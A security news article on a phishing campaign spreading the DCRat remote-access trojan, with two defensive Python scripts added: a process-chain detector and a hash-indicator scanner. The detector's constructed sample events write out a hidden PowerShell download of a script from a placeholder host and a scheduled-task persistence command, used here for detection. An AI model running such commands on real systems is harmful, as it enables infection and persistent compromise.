
Windows Devices at Risk – DCRat Malware Gains Remote Access, Steals Files and Browser Credentials

A newly uncovered cyberattack campaign, identified by the FortiMail Incident Response team, is targeting organizations in Colombia with a sophisticated Remote Access Trojan (RAT) known as DCRat.

Masquerading as communications from a Colombian government agency, this campaign leverages advanced obfuscation techniques and a multi-stage payload strategy to infiltrate Windows systems, gain remote access, and exfiltrate sensitive data.

Modular RAT with Advanced Capabilities

DCRat is notable for its modular architecture, which allows threat actors to customize the RAT for various malicious purposes, including surveillance, data theft, and persistence. Once installed, the malware enables attackers to:

  • Gain complete remote control of the infected systems, execute arbitrary commands, and manage files.
  • Steal credentials, browser data, and sensitive documents, including via screenshot capture and keylogging.
  • Manipulate system settings (such as rebooting, logging off users, or creating new accounts) and modify visual elements, including wallpapers.
  • Harvest browser cookies, browsing history, and saved credentials, as well as automate web actions from the victim’s browser.

Stealthy Multi-Stage Attack Chain

The attack initiates with a phishing email containing a password-protected ZIP file, designed to circumvent basic security filters.

This archive contains a batch (.bat) file that downloads and executes a heavily obfuscated Visual Basic script from a text-sharing website.

After several layers of obfuscation are removed, the script executes embedded base64-encoded payloads, which ultimately extract a final executable concealed within a steganographically altered image file hosted on an archive website.

Attack chain

The RAT’s configuration, including the C2 server IP, port, and cryptographic keys, is hardcoded and AES-256-encrypted; once decrypted, it is used to establish communications with the attacker’s infrastructure.

Anti-analysis and evasion functions are also present, such as checks for virtual machine environments, attempts to disable critical Windows administrative tools, bypassing Microsoft’s Antimalware Scan Interface (AMSI), and establishing persistence through scheduled tasks or registry modifications.
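The attack chain above (password-protected ZIP, a .bat that fetches a VBS from a text-sharing site, script execution, then persistence via scheduled tasks or Run keys) maps cleanly onto a process-tree detection. The following is an added example, not code from Fortinet or the article: it correlates process-creation events into parent/child chains and flags a cmd.exe/.bat root whose descendants reproduce two or more of the described stages. The event records, the `*.example` text-sharing domains, and the watchlists are constructed for this example; the `%TEMP%\Temp<N>_<archive>.zip\` scratch-folder pattern is an assumption about how Explorer opens a file directly out of a ZIP.

```python
import re
from collections import defaultdict

# Watchlists are constructed for this example; tune them to your own environment.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
DOWNLOADERS = {"powershell.exe", "curl.exe", "certutil.exe", "bitsadmin.exe"}
TEXT_SHARING_HOSTS = {"textshare.example", "rawpaste.example"}  # placeholder domains
# Assumption: Explorer opens a file straight out of a ZIP from a %TEMP%\Temp<N>_<archive>.zip\ scratch folder.
ARCHIVE_SCRATCH = re.compile(r"\\Temp\\Temp\d+_[^\\]+\.zip\\", re.IGNORECASE)
URL_HOST = re.compile(r"https?://([^/\s'\"]+)", re.IGNORECASE)


def _basename(image: str) -> str:
    return image.lower().rsplit("\\", 1)[-1]


def _stage_flags(event: dict) -> set:
    """Map one process-creation event to the attack stages it resembles."""
    img, cmd = _basename(event["image"]), event["cmdline"]
    low = cmd.lower()
    flags = set()
    if img in DOWNLOADERS and any(h.lower() in TEXT_SHARING_HOSTS for h in URL_HOST.findall(cmd)):
        flags.add("download_from_text_sharing_site")
    if img in SCRIPT_HOSTS and ".vbs" in low:
        flags.add("vbs_execution")
    if img == "schtasks.exe" and "/create" in low:
        flags.add("scheduled_task_persistence")
    if img == "reg.exe" and "currentversion\\run" in low:
        flags.add("run_key_persistence")
    return flags


def detect_dcrat_style_chain(events: list, min_stages: int = 2) -> list:
    """Flag cmd.exe/.bat roots whose subtree shows at least min_stages of the described chain."""
    children = defaultdict(list)
    for e in events:
        children[e["ppid"]].append(e)
    findings = []
    for root in events:
        if _basename(root["image"]) != "cmd.exe" or ".bat" not in root["cmdline"].lower():
            continue
        stages = {"bat_from_archive_scratch"} if ARCHIVE_SCRATCH.search(root["cmdline"]) else set()
        stack = list(children[root["pid"]])
        while stack:  # walk the whole subtree, not just direct children
            e = stack.pop()
            stages |= _stage_flags(e)
            stack.extend(children[e["pid"]])
        if len(stages) >= min_stages:
            findings.append({"root_pid": root["pid"], "cmdline": root["cmdline"], "stages": sorted(stages)})
    return findings


# Constructed sample telemetry: one malicious chain (pids 200-450) and one benign backup script (pids 500-600).
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c "C:\Users\ana\AppData\Local\Temp\Temp1_Notificacion.zip\Notificacion.bat"'},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -c \"(New-Object Net.WebClient).DownloadFile("
                "'https://textshare.example/raw/x1','C:\\Users\\ana\\AppData\\Local\\Temp\\upd.vbs')\""},
    {"pid": 400, "ppid": 200, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"wscript.exe C:\Users\ana\AppData\Local\Temp\upd.vbs"},
    {"pid": 450, "ppid": 400, "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks.exe /create /sc minute /mo 1 /tn "Updater" /tr C:\Users\ana\AppData\Local\Temp\upd.vbs'},
    {"pid": 500, "ppid": 100, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c "C:\Scripts\backup.bat"'},
    {"pid": 600, "ppid": 500, "image": r"C:\Windows\System32\robocopy.exe",
     "cmdline": r"robocopy.exe C:\Data D:\Backup /MIR"},
]

if __name__ == "__main__":
    for finding in detect_dcrat_style_chain(SAMPLE_EVENTS):
        print(finding)
```

Requiring two or more stages keeps a lone `cmd /c something.bat` from paging anyone, while the scratch-folder root plus a paste-site download or a scheduled-task creation from a script host is exactly the combination the campaign relies on. Feed it your EDR's process-creation events (Sysmon Event ID 1 or equivalent) with the same pid/ppid/image/cmdline fields.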

Severe Impact and Defense Measures

Once installed, DCRat can harvest critical information and establish persistent access, posing a severe threat to corporate and governmental systems.

The Fortinet suite of security products, including FortiMail, FortiGate, and FortiEDR, detects and blocks all stages of this malware, leveraging up-to-date threat intelligence and content disarmament technologies.

Key technical indicators (IOCs) have been published:

  • ZIP SHA-256: db21cc64fb7a7ed9075c96600b7e7e7007a0df7cb837189c6551010a6f828590
  • VBS SHA-256: b0f3c7ea17875b5e1545678b3878ce268ff4bde718b66254ce01b0bb864801b8
  • EXE SHA-256: 77a22e30e4cc900379fd4b04c707d2dfd174858c8e1ee3f1cbecd4ece1fab3fe
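The quickest use of the published hashes is a sweep of mail quarantines, download folders and user profiles. The script below is an added example, not Fortinet's tooling: it hashes every file under a directory in fixed-size chunks (so large archives do not load into memory) and reports matches against the three indicators above. Because the real samples are not on disk, the `demo()` function builds a scratch directory with a constructed placeholder file and registers that file's own hash as an extra, clearly labelled test indicator to exercise the matching path.

```python
import hashlib
import tempfile
from pathlib import Path

# SHA-256 indicators published for this campaign (taken from the article above).
DCRAT_IOCS = {
    "db21cc64fb7a7ed9075c96600b7e7e7007a0df7cb837189c6551010a6f828590": "DCRat phishing ZIP",
    "b0f3c7ea17875b5e1545678b3878ce268ff4bde718b66254ce01b0bb864801b8": "DCRat obfuscated VBS",
    "77a22e30e4cc900379fd4b04c707d2dfd174858c8e1ee3f1cbecd4ece1fab3fe": "DCRat final EXE",
}


def sha256_file(path, chunk_size: int = 1 << 20) -> str:
    """Hash a file in 1 MiB chunks so multi-gigabyte files do not need to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def scan_tree(root, iocs=DCRAT_IOCS) -> list:
    """Walk root recursively and return every file whose SHA-256 is a known indicator."""
    hits = []
    for path in Path(root).rglob("*"):
        if not path.is_file():
            continue
        try:
            digest = sha256_file(path)
        except OSError:
            continue  # locked or unreadable file; in production, log it rather than silently skipping
        label = iocs.get(digest.lower())
        if label:
            hits.append({"path": str(path), "sha256": digest, "label": label})
    return hits


def demo() -> list:
    """Constructed scenario: one benign file and one placeholder registered as a test indicator."""
    with tempfile.TemporaryDirectory() as tmp:
        benign = Path(tmp) / "readme.txt"
        benign.write_bytes(b"nothing to see here")
        marker = Path(tmp) / "attachments" / "Notificacion.zip"
        marker.parent.mkdir()
        marker.write_bytes(b"constructed placeholder, not the real sample")
        iocs = dict(DCRAT_IOCS)
        # Assumption for the demo only: treat this placeholder's hash as if it were a published indicator.
        iocs[hashlib.sha256(marker.read_bytes()).hexdigest()] = "constructed test indicator"
        return scan_tree(tmp, iocs)


if __name__ == "__main__":
    for hit in demo():
        print(f"{hit['label']}: {hit['path']} ({hit['sha256']})")
```

Lookups are done on the lowercase hex digest, so indicators pasted in upper case from another feed still match. A hash sweep only catches the exact files listed; pair it with the process-chain and attachment controls described in the article, since a recompiled stage changes the hash and not the behaviour.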

Organizations, especially in Latin America, are urged to educate users on phishing, maintain security solutions with the latest threat intelligence, and review incident response plans.
If compromise is suspected, immediate consultation with cybersecurity professionals is strongly advised.

Priya
